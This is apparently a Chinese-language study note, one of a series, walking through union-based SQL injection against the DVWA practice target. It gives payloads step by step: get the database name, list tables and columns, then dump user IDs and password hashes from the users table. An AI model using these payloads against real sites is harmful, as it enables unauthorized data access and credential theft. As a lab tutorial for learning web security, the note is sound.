web安全学习笔记(三)——SQL注入靶机测试

时间:2024-04-11 07:46:29

今天尝试了SQL注入靶机爆库爆表操作,分享如下:
1.设置靶机安全级别为低级
web安全学习笔记(三)——SQL注入靶机测试
2.进入SQL注入界面
web安全学习笔记(三)——SQL注入靶机测试
3.输入1提交
web安全学习笔记(三)——SQL注入靶机测试
3.用单引号让id闭合,输入1’ union select 1, database()#
web安全学习笔记(三)——SQL注入靶机测试
4.既然知道了数据库,就尝试爆出数据库中的表,输入
1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#
web安全学习笔记(三)——SQL注入靶机测试
5.爆出表名如上图所示,尝试爆出users表的列,输入
1’ union select 1,column_name from information_schema.columns where table_name=‘users’#
web安全学习笔记(三)——SQL注入靶机测试
6.关注该表中的关键字段id和password,尝试爆数据,输入
1’ union select user_id,password from users#
web安全学习笔记(三)——SQL注入靶机测试
该内容仅用于学习,请遵守国家相关法律法规,不要将技术用于非法行径,学习时请不要对网站进行操作,共同维护绿色网络环境,请使用靶机进行练习。